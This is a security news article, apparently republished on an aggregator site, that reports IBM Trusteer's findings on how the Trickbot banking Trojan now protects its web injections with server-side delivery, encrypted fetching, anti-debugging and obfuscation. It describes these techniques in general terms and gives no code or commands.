Trickbot Injections Get Harder to Detect & Analyze

  /     /     /  
Publicated : 23/11/2024   Category : security


Trickbot Injections Get Harder to Detect & Analyze


The authors of the infamous malware family have added measures for better protecting malicious code injections against inspection and research.



The authors of the Trickbot Trojan have added multiple layers of defenses around the malware to make it harder for defenders to detect and analyze the injections it uses during malicious operations.
The improvements coincide with escalating activity around the malware and appear designed for attacks in which Trickbot is being used to conduct online banking fraud — something the tool was originally designed for before it was repurposed for malware distribution purposes.
Researchers from IBM Trusteer analyzed the most recent code injections that Trustbot uses in the process of stealing information for conducting banking fraud. They discovered new tweaks to it of the type that the operators of the malware have been making since it was first released in 2016.
The updates include a new server-side injection mechanism; encrypted communications with the command-and-control (C2) server for fetching injections; an anti-debugging feature; and new ways to obfuscate and hide the inject code. Limor Kessem, executive security adviser at IBM, describes the changes as part of an ongoing effort that Trickbots developers have been putting into keeping the malware one step ahead of security researchers and detection tools.
Malware that’s designed to get through security controls, as Trickbot is, has to be constantly updated, Kessem says. Things change [at] the code level, resources are encoded/encrypted and obfuscated. These efforts are there to prevent detection and hinder analysis as much as possible. 
Trickbot emerged not long after Russian law enforcement authorities arrested the operators of
Dyre
, a banking Trojan that was used in attacks that ended up costing millions of dollars in losses for banks such as Chase and Bank of America. The highly modular tool started off as a banking Trojan like Dyre and is designed to steal information that would allow attackers to access and steal money from a victims bank account. Over the years, Trickbot morphed also into a vehicle for distributing other malware, including ransomware and other banking Trojans, such as Emotet.
The operators of Trickbot have so far been largely impervious to takedown attempts. This includes one attempt in October 2020 in which researchers at Microsoft, ESET, and other security vendors worked with the Financial Services Information Sharing and Analysis Center to
disrupt Trickbots C2 infrastructure
. At the time, the malware had infected more than a million systems in 12 countries. Though the takedown effort resulted in some 19 different Trickbot C2 servers at different locations being disconnected, it had only a
moderate impact
at best on the malware operation. Details from an indictment last year against a Latvian developer of the malware described the core Trickbot group as made up of some 20 individuals, including software developers, malware experts, money mules, and programmers.
Extra Protections
IBMs analysis of the latest version of TrickBot
shows that the operators have added extra protections to code injections that are used in real time when a user with an infected machine might attempt to access their bank account online. The injections are designed to modify information going out from the users browser on-the-fly before it reaches the banks server.
One of the ways cybercriminals trick victims into divulging sensitive information Is by using customized Web-injection flows that mimic what they would normally expect when interacting online with their bank, Kessem says. They can go all the way to creating a fake banking site on their servers and take victims there instead, she says. In other cases, they create a more robust scheme that involves humans on the other end, as was the case with Dyre attackers.
IBMs analysis shows that instead of fetching injection code from configuration files stored locally on a compromised system, Trickbots operators now have begun injecting the code in real time from their own server. This kind of server-side injection is easier for attackers to manipulate in real time than locally stored injections. They also make it much harder for defenders to understand what malicious activity might be launched against a particular target, IBM said.
A JavaScript downloader that Trickbot uses has also been tweaked so it now uses the HTTPS protocol to securely fetch Web injections from an attacker-controlled inject-server. The injections are tailored for specific bank URLs and are designed to trick users into divulging information the attackers can use to steal money from an online bank account.
As a further measure, Trickbots authors have added an anti-debugging feature to the malwares JavaScript code. The debugging feature is designed to spot the so-called code-beautifying that security researchers do when analyzing suspicious code. When Trickbots new anti-debugging mechanism detects any attempt at such code beautifying, it immediately triggers a process that results in memory getting overloaded and the browser crashing, IBM said.
The code that Trickbot injects itself is also highly obfuscated. It is encoded with Base64 and uses a variety of tricks such as making code unreadable to the human eye or hiding information about code execution and representing numbers and variables in a deliberately complex way. Knowing about the techniques helps defenders know what to expect, Kessem says, and to unpack the challenging parts so they can analyze the malware and adjust controls. 

Last News

▸ Nigerian scammers now turning into mediocre malware pushers. ◂
Discovered: 23/12/2024
Category: security

▸ Beware EMV may not fully protect against skilled thieves. ◂
Discovered: 23/12/2024
Category: security

▸ Hack Your Hotel Room ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Trickbot Injections Get Harder to Detect & Analyze